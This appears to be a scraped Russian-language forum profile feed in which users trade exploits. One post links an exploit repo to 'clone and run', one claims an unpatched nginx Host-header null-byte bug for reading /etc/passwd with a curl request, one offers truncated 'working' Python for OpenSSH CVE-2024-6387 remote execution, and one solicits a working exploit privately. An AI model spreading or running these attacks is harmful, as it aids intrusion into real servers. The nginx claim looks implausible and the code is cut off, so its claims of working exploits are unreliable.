«Новый эксплойт для CVE-2025-1234:
https://github.com/attacker/exploit-CVE-2025-1234
Клонируйте и запускайте. Работает на Windows 11 23H2.»
User Profile
Collapse
-
«Только что наткнулся на баг в последней версии nginx 1.27.0. Если передать %00 в заголовке Host, то можно прочитать файл /etc/passwd. Вот пример запроса:
bash
curl -H "Host: example.com%00" http://target/
Вендор ещё не знает, патча нет.... -
CVE-2024-6387
Вот рабочий код для удалённого выполнения команд на OpenSSH 9.6p1:
python
import socket, sys
def exploit(host, port, command):
sock = socket.socket()
sock.connect((host, port))
sock.send(b"ssh...Leave a comment:
-
Кто-нибудь уже пробовал эксплуатировать CVE-2024-6387 на OpenSSH 9.6p1? Слышал, что через race condition можно получить удалённый доступ. Пока патча нет. На форуме выложили PoC, но он не всегда срабатывает. Если есть рабочий вариант – скиньте в личку.
No activity results to display
Show More
Leave a comment: